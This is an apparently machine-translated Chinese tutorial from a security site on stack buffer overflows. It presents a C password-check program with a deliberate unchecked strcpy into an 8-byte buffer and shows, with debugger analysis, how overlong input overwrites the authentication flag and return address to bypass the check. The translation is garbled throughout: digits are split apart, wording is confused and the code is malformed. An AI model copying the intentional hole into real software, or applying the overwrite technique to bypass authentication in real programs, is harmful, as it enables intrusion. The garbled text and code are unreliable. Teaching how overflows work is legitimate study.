Stack overflow exploit-vulnerability warning-the black bar safety net

ID MYHACK58:62201560968
Type myhack58
Reporter 佚名
Modified 2015-04-09T00:00:00


We followed the above stack overflow principle to explain the stack overflow use, first of all, we will not then on an article of the articles of examples to explain, I'll write a C language examples to explain. Then go over stack overflow principle. Become more familiar with stack overflow principles to be able to let's better utilize stack overflow. The following example code below: the code is very simple I do not do the interpretation



define PASSWORD "qqqqqqq"

int verify_password(char *password) { int authenticated; char buffer[8]; authenticated=strcmp(password,PASSWORD); strcpy(buffer,password); //construct stack overflow return authenticated; } int main() { int valid_flag=0; char password[1 0 2 4]; while(1) { printf("please input password: "); scanf("%s",password); valid_flag=verify_password(password); if(valid_flag) { printf("incorrect password!\ n\n"); } else { printf("Congratulation! you have passed the Verification !\ n"); break; } } getchar(); char i; scanf("%s",&i); } From the above examples it can be seen is the password to verify the validity of an example, by the input password for authentication whether the password is input correctly, first of all, we now run the following program. !

By entering the correct password and incorrect password difference; Input 7 A'q'the program of the normal operation of the stack state. The following figure you can see the stack inside the case: !

If you continue increasing the input characters, then beyond the buffer[8]the boundary of the character will be sequentially flooded authenticated, before the stack frame EBP, the return address. In other words, good control of the length of the string can make the string corresponding to the character ASCII code to cover off these stack frames state value. In accordance with the above on the stack frame of the analysis, we can draw the following conclusions: (1)Input 1 1 A'q', pp. 9-1 1 characters along with the NULL Terminator will be authenticated scour for 0x00717171 it. (2)Input 1 5'q', 9-1 2 characters will be authenticated scour for 0x71717171; the 1 3-1 5 characters with NULL Terminator to the front Stack frame EBP scour for 0x00717171 it. (3)Input 1 9 A'q', 9-1 2 character will be authenticated scour for 0x71717171; the 1 3-1 6 characters with NULL Terminator to the front of the stack Frame EBP scour for 0x71717171; No. 1 7-1 9 characters with a NULL Terminator will return the address of the erosion of 0x00717171 it. Here with 1 of 9 characters as input, look at the flooded return address will be on the program to produce what effect. For double word alignment of objects, we lose Into a string according to the"4 3 2 1"as a unit is organized, the last input string is"4 3 2 1 4 3 2 1 4 3 2 1 4 3 2 1 4 3 2"for testing. Use OllyDbg to load the program, in the string copy function call after the end of the observation stack state.& gt; The following for analysis: When the input 7 q, the Watcher returns the stack contents. !

Following implementation of this code: 4 3 2 1 4 3 2 1 4 3 2 1 4 3 2 1 4 3 2 The actual memory situation and our analysis of the conclusion is consistent, then the stack state. Please see the following table of content: !

Next we use the OD to debug the following program to run the process: !

The return address for the current function returns when the redirect program code. The function returns the"retn"instruction is executed, the top element happens to be the return address."retn"instruction will put this return address on the bomb into the EIP register, then jump to this address to go to Execution. In this example, the return address would have been 0x040FACB, corresponding to the main function code area of the instruction, now we have to put this address using the character of ASCII code coverage became 0x00323334 it. We can see from the debugger in the display seen on the computer events. (1)The function returns when the return address is loaded into the EIP register. (2)The processor in accordance with the EIP register to the address 0x00323334 take finger. (3)memory 0x00323334 and not a legitimate instruction, the Processor does not know how to handle, hence the error. Due to the 0x00323334 is an invalid instruction address, so the Processor fetch occurs when the error causes the program to crash. But if here we give an effective address of the instruction, you can let the Processor jump to any instruction to perform(like jump directly to Program Verification through the section), that is, we can through the submerged return address and the control program execution flow. This time we will think of this section of the code is performed on the password authentication, if Yes it displays the correct information, if not pop up an error message, this time we can modify this function returns the address directly to perform the correct information so that to achieve our purpose; next we want to program to make certain improvements.

[1] [2] next